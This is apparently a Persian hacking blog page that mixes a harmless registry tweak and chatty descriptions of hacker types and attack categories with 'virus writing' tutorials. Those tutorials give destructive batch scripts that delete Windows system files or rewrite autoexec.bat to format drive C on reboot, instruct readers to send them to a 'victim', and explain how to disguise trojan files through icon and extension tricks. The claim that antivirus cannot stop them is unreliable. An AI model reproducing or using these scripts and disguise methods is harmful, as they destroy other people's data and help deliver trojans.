ویروس

سریعتر کردن منوی start [ریجستری ]

 سلام باز هم یه ترفند با حال براتون گذاشتم برید حال کنید

در حالت طبیعی در منوی start  زیر منو ها با سرعت  400  میلی ثانیه ظاهر می شوند که اگر بخواهید می توانید سرعت آنرا بیشتر کنید برای اینکار در start  روی Run  کلیک کنید حالا با تایپ Regedit  و کلیک OK  وارد ریجستری شوید مسیر زیر را بیابید

HKEY-CURRENT-USER/control panel/desktop

در صفحه روبرو فقره Menu show Delay  را بیابید و آنرا باز کنید. شما می توانید متغیر را از صفر تا  999  تغییر بدهید. بعد OK  را بزنید از ریجستری خارج شوید و سیستم را Restart  کنید و نتیجه را مشاهده کنید

 

ویروسی که شناسایی نمیشه [ویروس نویسی , ]

سلام دوستان امروز با یه آموزش بسیار خفن اومدم

این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه

برای ساختن این ویروس مراحل زیر رو انجام بدید

به نوت پد رفته و این عبارت رو بنویسید

del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت bat  سیو کنین و برای قربانی بفرستین

 

آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک  ]

برای اینکار  2  راه موجود می باشد که من این  2  راه را برای شما میگم:

راه اول :

یک عدد فایل تروجان آماده کنید...

یه wordpad  باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new  برید و یه wordpad documernt  باز کنید .

فایل تروجان رو کپی کنید و توی  wordpad  پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه  word   رها کنید .

حال همون فایلی رو که تو word  گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید

بعد به edit  برید و بعد به package object  و روی برگه edit package  کلیک کنید حالا در پبجره باز شده به edit  برید و copy package  رو بزنید .

در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste  رو بزنید .

به همین آسونی فایل تروجان exe  یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .

راه دوم :

بر روی  فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه    create shortcut  را بر گزینید . حالا یه فایل از همون تروجان با اسم  shortcut  درست شده است حالا بر روی   shortcut  آن راست کلیک کنید و گزینه Properties  را انتخاب کنید حال در پنجره باز شده جدید  در بالای آن  گزینه   shortcut  را انتخاب کنید و بعد بر روی گزینه change icon  کیک کنید و در پنجره باز شده  100  ، 200  تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse  آیکنی که خود شما دارید را برگزینید

 

یك ویروس برای فرمت كردن درایو C شخص مورد نظر [ویروس نویسی , ]

برنامه NotePad  رو باز كنین بعد فرمان زیر رو توش كپی و پیست كنید:
 

 @echo off
 call attrib -r -h c:autoexec.bat  >nul
 echo @echo off  >c:autoexec.bat
 echo format /autotest  c:/q>nul  >>c:autoexec.bat
 call attrib +r +h c:autoexec.bat  >nul
 exit


حالا فایل را با پسوند bat  ذخیره كنین. مواظب یاشین كه فایل رو اجرا نكنین چون كل اطلاعات درایو سی شما پاك می شه!
 
 این فایل چه كار می كنه؟
 اول كل اطلاعات موجود تو فایل autoexe.bat  رو پاك می كنه بعد كد format /autotest c:/q  رو توش می زاره وقتی هدف شما كامپیوتر رو ریست و دوباره راه اندازی كنه این كد اجرا می شه و درایو سی فرمت می شه!

------------------------

راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با كمی تغییر توی فرمان ها می تونین تعیین کنین

 

انواع هکرها:

1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه  100  ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!


2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!


3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker  هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.

4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!

 

انواع حمله هکرها:
- استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff  بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا  2  زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
- دستکاری اطلاعات (modification  ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از  13  بشه  18!

- افزودن اطلاعات و جعل ( fabrication  ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification  آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
- حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما  2  مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض  5  ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا  1  دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.

 

آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ویروس نویسی  ]

خوب اول یک

Notepad  یا همان Txt Document 

باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت

Bat

سیو میکنید...

C:

del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini 

مثل:

Virus.bat

به جای کلمه ویروس هم اسم مورد نظر را بگذارید...

 

ساخت ویروس بلاستر [ویروس نویسی , ]

برای این كار ابتدا برنامه notepad  را باز كرده و دستور زیر را در آن تایپ كنید

در خط اول @echo off

Shutdown –s –t XX  برای خاموش شدن سیستم پس از اتمام زمان تعیین شده

Shutdown –r –t XX  برای ری- استارت شدن سیستم پس از اتمام زمان تعیین

شده

Shutdown –l –t XX  برای لوگ آف شدن سیستم پس از اتمام زمان تعیین شده

Shutdown –f –t XX  برای لوگ آف شدن سیستم پس از اتمام زمان تعیین شده

نكته !  در دستور ها بجای XX  باید یك زمان بر حسب ثانیه تعیین كرد

نكته ! توجه داشته باشید كه هر یك فاصله را در دستورات درست بزنید

نكته ! ضمنا می تونید دستورات را از اینجا كپی كنید

نكته ! ضمنا برای پی از اجرای فایل درست شد چنان چه از كار خود پشیمان شدید

می تواند در run   این دستور را تایپ و اكی كرد ---<   shutdown -a

خوب حالا باید برنامه notepad  را با هر اسم دلخواهی ولی حتما با پسوند .bat 

ذخیره كرد.

گزارش تخلف
بعدی